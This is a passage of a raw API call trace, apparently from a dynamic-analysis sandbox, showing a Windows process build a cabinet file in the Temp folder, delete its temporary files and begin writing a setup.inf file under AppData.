(_Str1="InfHeader2", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfHeader3", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfHeader4", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfHeader5", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfHeader6", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="InfSectionOrder", _Str2="Infdisk#") returned 15 [0256.310] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="MaxDiskSize", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="MaxErrors", _Str2="Infdisk#") returned 4 [0256.310] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infdisk#") returned 9 [0256.310] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infdisk#") returned 9 [0256.310] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infdisk#") returned 9 [0256.310] _strcmpi (_Str1="RptFileName", _Str2="Infdisk#") returned 9 [0256.310] _strcmpi (_Str1="SourceDir", _Str2="Infdisk#") returned 10 [0256.310] _strcmpi (_Str1="UniqueFiles", _Str2="Infdisk#") returned 12 [0256.310] _strcmpi (_Str1="DiskDirectory1", _Str2="Infdisk#") returned -5 [0256.310] _strcmpi (_Str1="CabinetName1", _Str2="Infdisk#") returned -6 [0256.310] atoi (_Str="1") returned 1 [0256.310] _vsnprintf (in: _DstBuf=0x27e87fe720, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe688 | out: _DstBuf="Infdisk#") returned 8 [0256.310] atoi (_Str="1") returned 1 [0256.310] _strcmpi (_Str1="cab#", _Str2="disk#") returned -1 [0256.310] _strcmpi (_Str1="csum", _Str2="disk#") returned -1 [0256.310] _strcmpi (_Str1="disk#", _Str2="disk#") returned 0 [0256.310] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87feca8 | out: _DstBuf="1") returned 1 [0256.310] _strcmpi (_Str1="Cabinet", _Str2="Infcab#") returned -6 [0256.310] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="ChecksumWidth", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="ClusterSize", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="Compress", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="CompressionType", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="CompressionLevel", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="CompressionMemory", _Str2="Infcab#") returned -6 [0256.311] _strcmpi (_Str1="DestinationDir", _Str2="Infcab#") returned -5 [0256.311] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infcab#") returned -5 [0256.311] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infcab#") returned -5 [0256.311] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infcab#") returned -5 [0256.311] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infcab#") returned -3 [0256.311] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infcab#") returned -3 [0256.311] _strcmpi (_Str1="GenerateInf", _Str2="Infcab#") returned -2 [0256.311] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infcab#") returned 70 [0256.311] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infcab#") returned 70 [0256.311] _strcmpi (_Str1="InfCommentString", _Str2="Infcab#") returned 14 [0256.311] _strcmpi (_Str1="InfDateFormat", _Str2="Infcab#") returned 1 [0256.311] _strcmpi (_Str1="InfDiskHeader", _Str2="Infcab#") returned 1 [0256.311] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infcab#") returned 1 [0256.311] _strcmpi (_Str1="InfFileHeader", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFileName", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFooter", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFooter1", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFooter2", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFooter3", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfFooter4", _Str2="Infcab#") returned 3 [0256.311] _strcmpi (_Str1="InfHeader", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader1", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader2", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader3", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader4", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader5", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfHeader6", _Str2="Infcab#") returned 5 [0256.311] _strcmpi (_Str1="InfSectionOrder", _Str2="Infcab#") returned 16 [0256.311] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infcab#") returned 4 [0256.311] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infcab#") returned 4 [0256.311] _strcmpi (_Str1="MaxDiskSize", _Str2="Infcab#") returned 4 [0256.312] _strcmpi (_Str1="MaxErrors", _Str2="Infcab#") returned 4 [0256.312] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infcab#") returned 9 [0256.312] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infcab#") returned 9 [0256.312] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infcab#") returned 9 [0256.312] _strcmpi (_Str1="RptFileName", _Str2="Infcab#") returned 9 [0256.312] _strcmpi (_Str1="SourceDir", _Str2="Infcab#") returned 10 [0256.312] _strcmpi (_Str1="UniqueFiles", _Str2="Infcab#") returned 12 [0256.312] _strcmpi (_Str1="DiskDirectory1", _Str2="Infcab#") returned -5 [0256.312] _strcmpi (_Str1="CabinetName1", _Str2="Infcab#") returned -6 [0256.312] atoi (_Str="1") returned 1 [0256.312] _vsnprintf (in: _DstBuf=0x27e87fe720, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe688 | out: _DstBuf="Infcab#") returned 7 [0256.312] atoi (_Str="1") returned 1 [0256.312] _strcmpi (_Str1="cab#", _Str2="cab#") returned 0 [0256.312] _vsnprintf (in: _DstBuf=0x27e8c1af6a, _MaxCount=0x1fd, _Format="%d", _ArgList=0x27e87feca8 | out: _DstBuf="1") returned 1 [0256.312] _strcmpi (_Str1="Cabinet", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="ChecksumWidth", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="ClusterSize", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="Compress", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="LongSourceFileNames", _Str2="Inffile") returned 3 [0256.312] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="CompressionType", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="CompressionLevel", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="CompressionMemory", _Str2="Inffile") returned -6 [0256.312] _strcmpi (_Str1="DestinationDir", _Str2="Inffile") returned -5 [0256.312] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Inffile") returned -5 [0256.312] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Inffile") returned -5 [0256.312] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Inffile") returned -5 [0256.312] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Inffile") returned -3 [0256.312] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Inffile") returned -3 [0256.312] _strcmpi (_Str1="GenerateInf", _Str2="Inffile") returned -2 [0256.313] _strcmpi (_Str1="InfCabinetHeader", _Str2="Inffile") returned -3 [0256.313] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Inffile") returned -3 [0256.313] _strcmpi (_Str1="InfCommentString", _Str2="Inffile") returned -3 [0256.313] _strcmpi (_Str1="InfDateFormat", _Str2="Inffile") returned -2 [0256.313] _strcmpi (_Str1="InfDiskHeader", _Str2="Inffile") returned -2 [0256.313] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Inffile") returned -2 [0256.313] _strcmpi (_Str1="InfFileHeader", _Str2="Inffile") returned 104 [0256.313] _strcmpi (_Str1="InfFileLineFormat", _Str2="Inffile") returned 108 [0256.313] _strcmpi (_Str1="InfFileName", _Str2="Inffile") returned 110 [0256.313] _strcmpi (_Str1="InfFooter", _Str2="Inffile") returned 6 [0256.313] _strcmpi (_Str1="InfFooter1", _Str2="Inffile") returned 6 [0256.313] _strcmpi (_Str1="InfFooter2", _Str2="Inffile") returned 6 [0256.313] _strcmpi (_Str1="InfFooter3", _Str2="Inffile") returned 6 [0256.313] _strcmpi (_Str1="InfFooter4", _Str2="Inffile") returned 6 [0256.313] _strcmpi (_Str1="InfHeader", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader1", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader2", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader3", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader4", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader5", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfHeader6", _Str2="Inffile") returned 2 [0256.313] _strcmpi (_Str1="InfSectionOrder", _Str2="Inffile") returned 13 [0256.313] _strcmpi (_Str1="MaxCabinetSize", _Str2="Inffile") returned 4 [0256.313] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Inffile") returned 4 [0256.313] _strcmpi (_Str1="MaxDiskSize", _Str2="Inffile") returned 4 [0256.313] _strcmpi (_Str1="MaxErrors", _Str2="Inffile") returned 4 [0256.313] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Inffile") returned 9 [0256.313] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Inffile") returned 9 [0256.313] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Inffile") returned 9 [0256.313] _strcmpi (_Str1="RptFileName", _Str2="Inffile") returned 9 [0256.313] _strcmpi (_Str1="SourceDir", _Str2="Inffile") returned 10 [0256.313] _strcmpi (_Str1="UniqueFiles", _Str2="Inffile") returned 12 [0256.313] _strcmpi (_Str1="DiskDirectory1", _Str2="Inffile") returned -5 [0256.313] _strcmpi (_Str1="CabinetName1", _Str2="Inffile") returned -6 [0256.313] atoi (_Str="1") returned 1 [0256.313] _vsnprintf (in: _DstBuf=0x27e87fe720, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe688 | out: _DstBuf="Inffile") returned 7 [0256.313] atoi (_Str="1") returned 1 [0256.313] _strcmpi (_Str1="cab#", _Str2="file") returned -3 [0256.314] _strcmpi (_Str1="csum", _Str2="file") returned -3 [0256.314] _strcmpi (_Str1="disk#", _Str2="file") returned -2 [0256.314] _strcmpi (_Str1="attr", _Str2="file") returned -5 [0256.314] _strcmpi (_Str1="date", _Str2="file") returned -2 [0256.314] _strcmpi (_Str1="file", _Str2="file") returned 0 [0256.314] _strcmpi (_Str1="Cabinet", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="ChecksumWidth", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="ClusterSize", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="Compress", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infsize") returned 3 [0256.314] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="CompressionType", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="CompressionLevel", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="CompressionMemory", _Str2="Infsize") returned -6 [0256.314] _strcmpi (_Str1="DestinationDir", _Str2="Infsize") returned -5 [0256.314] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infsize") returned -5 [0256.314] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infsize") returned -5 [0256.314] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infsize") returned -5 [0256.314] atoi (_Str="1") returned 1 [0256.314] _vsnprintf (in: _DstBuf=0x27e87fe720, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fe688 | out: _DstBuf="Infsize") returned 7 [0256.314] atoi (_Str="1") returned 1 [0256.314] _vsnprintf (in: _DstBuf=0x27e8c1af7f, _MaxCount=0x1e8, _Format="%ld", _ArgList=0x27e87feca8 | out: _DstBuf="96") returned 2 [0256.314] fprintf (in: _File=0x7ff97744e300, _Format="%s\n" | out: _File=0x7ff97744e300) returned 26 [0256.314] _write (in: _FileHandle=10, _Buf=0x27e8aa2aa4*, _MaxCharCount=0x10 | out: _Buf=0x27e8aa2aa4*) returned 16 [0256.315] _write (in: _FileHandle=10, _Buf=0x27e8aa2bca*, _MaxCharCount=0x13 | out: _Buf=0x27e8aa2bca*) returned 19 [0256.316] _read (in: _FileHandle=8, _DstBuf=0x27e8aa2aa4, _MaxCharCount=0x10 | out: _DstBuf=0x27e8aa2aa4) returned 0 [0256.316] _errno () returned 0x27e8c10840 [0256.316] _close (_FileHandle=7) returned 0 [0256.316] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_5") returned 0 [0256.317] _close (_FileHandle=8) returned 0 [0256.318] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_6") returned 0 [0256.322] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\2314.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0256.323] GetLastError () returned 0x0 [0256.323] _open_osfhandle (_OSFileHandle=0xa0, _Flags=33666) returned 7 [0256.323] _write (in: _FileHandle=7, _Buf=0x27e8aa2a80*, _MaxCharCount=0x24 | out: _Buf=0x27e8aa2a80*) returned 36 [0256.324] _lseek (_FileHandle=11, _Offset=0, _Origin=0) returned 0 [0256.324] _read (in: _FileHandle=11, _DstBuf=0x27e8c199e0, _MaxCharCount=0x8 | out: _DstBuf=0x27e8c199e0*) returned 8 [0256.324] _write (in: _FileHandle=7, _Buf=0x27e8c199e0*, _MaxCharCount=0x8 | out: _Buf=0x27e8c199e0*) returned 8 [0256.324] _read (in: _FileHandle=11, _DstBuf=0x27e8c199e0, _MaxCharCount=0x8 | out: _DstBuf=0x27e8c199e0) returned 0 [0256.324] _errno () returned 0x27e8c10840 [0256.324] _lseek (_FileHandle=10, _Offset=0, _Origin=0) returned 0 [0256.324] _read (in: _FileHandle=10, _DstBuf=0x27e8af6470, _MaxCharCount=0x8000 | out: _DstBuf=0x27e8af6470*) returned 35 [0256.324] _errno () returned 0x27e8c10840 [0256.324] _write (in: _FileHandle=7, _Buf=0x27e8af6470*, _MaxCharCount=0x23 | out: _Buf=0x27e8af6470*) returned 35 [0256.325] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.325] _vsnprintf (in: _DstBuf=0x27e87fed60, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87fecc8 | out: _DstBuf=" 29.91") returned 6 [0256.325] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.325] printf (_Format="%s%s\r") returned 34 [0256.414] _read (in: _FileHandle=10, _DstBuf=0x27e8af6470, _MaxCharCount=0x8000 | out: _DstBuf=0x27e8af6470) returned 0 [0256.414] _errno () returned 0x27e8c10840 [0256.414] _lseek (_FileHandle=9, _Offset=0, _Origin=0) returned 0 [0256.415] _read (in: _FileHandle=9, _DstBuf=0x27e8af6470, _MaxCharCount=0x8000 | out: _DstBuf=0x27e8af6470*) returned 82 [0256.415] _errno () returned 0x27e8c10840 [0256.415] _write (in: _FileHandle=7, _Buf=0x27e8af6470*, _MaxCharCount=0x52 | out: _Buf=0x27e8af6470*) returned 82 [0256.415] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.415] _vsnprintf (in: _DstBuf=0x27e87fed60, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87fecc8 | out: _DstBuf="100.00") returned 6 [0256.415] atoi (_Str="1%% [flushing current folder]") returned 1 [0256.415] printf (_Format="%s%s\r") returned 34 [0256.432] _read (in: _FileHandle=9, _DstBuf=0x27e8af6470, _MaxCharCount=0x8000 | out: _DstBuf=0x27e8af6470) returned 0 [0256.432] _errno () returned 0x27e8c10840 [0256.432] _lseek (_FileHandle=7, _Offset=0, _Origin=2) returned 161 [0256.433] _lseek (_FileHandle=7, _Offset=0, _Origin=0) returned 0 [0256.433] _write (in: _FileHandle=7, _Buf=0x27e8aa2a80*, _MaxCharCount=0x4 | out: _Buf=0x27e8aa2a80*) returned 4 [0256.433] _close (_FileHandle=7) returned 0 [0256.433] _close (_FileHandle=9) returned 0 [0256.434] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_7") returned 0 [0256.435] _close (_FileHandle=10) returned 0 [0256.436] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_8") returned 0 [0256.437] _close (_FileHandle=11) returned 0 [0256.437] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_9") returned 0 [0256.439] GetCurrentProcessId () returned 0x200 [0256.439] _vsnprintf (in: _DstBuf=0x27e87fefe3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fefd8 | out: _DstBuf="_512_") returned 5 [0256.439] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_12" [0256.439] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_12" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_12"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0256.439] GetLastError () returned 0x0 [0256.439] _open_osfhandle (_OSFileHandle=0xac, _Flags=34178) returned 7 [0256.439] GetCurrentProcessId () returned 0x200 [0256.439] _vsnprintf (in: _DstBuf=0x27e87fefe3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fefd8 | out: _DstBuf="_512_") returned 5 [0256.439] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_13" [0256.440] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_13" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_13"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0256.440] GetLastError () returned 0x0 [0256.440] _open_osfhandle (_OSFileHandle=0xa8, _Flags=34178) returned 8 [0256.440] GetCurrentProcessId () returned 0x200 [0256.440] _vsnprintf (in: _DstBuf=0x27e87fefe3, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fefd8 | out: _DstBuf="_512_") returned 5 [0256.440] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_14" [0256.440] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_14" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_14"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0256.441] GetLastError () returned 0x0 [0256.441] _open_osfhandle (_OSFileHandle=0xa4, _Flags=34178) returned 9 [0256.441] FCIDestroy () returned 0x1 [0256.447] _close (_FileHandle=6) returned 0 [0256.447] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_10") returned 0 [0256.448] _close (_FileHandle=12) returned 0 [0256.448] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_11") returned 0 [0256.449] _close (_FileHandle=7) returned 0 [0256.449] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_12") returned 0 [0256.449] _close (_FileHandle=8) returned 0 [0256.449] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_13") returned 0 [0256.450] _close (_FileHandle=9) returned 0 [0256.450] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_14") returned 0 [0256.451] clock () returned 0x84c [0256.451] time (in: timer=0x27e87ff2e0 | out: timer=0x27e87ff2e0) returned 0x5be0dfff [0256.451] _strcmpi (_Str1="Cabinet", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="ClusterSize", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="Compress", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileName") returned 3 [0256.451] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="CompressionType", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileName") returned -6 [0256.451] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileName") returned -6 [0256.452] _strcmpi (_Str1="DestinationDir", _Str2="InfFileName") returned -5 [0256.452] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileName") returned -5 [0256.452] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileName") returned -5 [0256.452] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileName") returned -5 [0256.452] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileName") returned -3 [0256.452] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileName") returned -3 [0256.452] _strcmpi (_Str1="GenerateInf", _Str2="InfFileName") returned -2 [0256.452] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileName") returned -3 [0256.452] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileName") returned -3 [0256.452] _strcmpi (_Str1="InfCommentString", _Str2="InfFileName") returned -3 [0256.452] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileName") returned -2 [0256.452] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileName") returned -2 [0256.452] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileName") returned -2 [0256.452] _strcmpi (_Str1="InfFileHeader", _Str2="InfFileName") returned -6 [0256.452] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFileName") returned -2 [0256.452] _strcmpi (_Str1="InfFileName", _Str2="InfFileName") returned 0 [0256.452] fclose (in: _File=0x7ff97744e2a0 | out: _File=0x7ff97744e2a0) returned 0 [0256.454] fclose (in: _File=0x7ff97744e2d0 | out: _File=0x7ff97744e2d0) returned 0 [0256.470] fclose (in: _File=0x7ff97744e300 | out: _File=0x7ff97744e300) returned 0 [0256.480] fopen (_Filename="setup.inf" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.inf"), _Mode="wb") returned 0x7ff97744e2a0 [0256.481] _strcmpi (_Str1="Cabinet", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="ClusterSize", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="Compress", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCommentString") returned 3 [0256.481] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="CompressionType", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="CompressionLevel", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="CompressionMemory", _Str2="InfCommentString") returned -6 [0256.481] _strcmpi (_Str1="DestinationDir", _Str2="InfCommentString") returned -5 [0256.481] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCommentString") returned -5 [0256.481] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCommentString") returned -5 [0256.481] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCommentString") returned -5 [0256.481] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCommentString") returned -3 [0256.481] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCommentString") returned -3 [0256.481] _strcmpi (_Str1="GenerateInf", _Str2="InfCommentString") returned -2 [0256.481] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCommentString") returned -14 [0256.481] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfCommentString") returned -14 [0256.481] _strcmpi (_Str1="InfCommentString", _Str2="InfCommentString") returned 0 [0256.481] ctime (param_1=0x27e87ff2e0) returned="Tue Nov 06 11:27:43 2018\n" [0256.481] _strcmpi (_Str1="Cabinet", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="Compress", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader") returned 3 [0256.482] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="CompressionType", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader") returned -6 [0256.482] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader") returned -3 [0256.482] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader") returned -3 [0256.482] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader") returned -5 [0256.482] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader") returned -4 [0256.482] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader") returned -4 [0256.482] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader") returned -4 [0256.482] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFileName", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFooter", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFooter1", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFooter2", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFooter3", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfFooter4", _Str2="InfHeader") returned -2 [0256.482] _strcmpi (_Str1="InfHeader", _Str2="InfHeader") returned 0 [0256.482] atoi (_Str="1*** 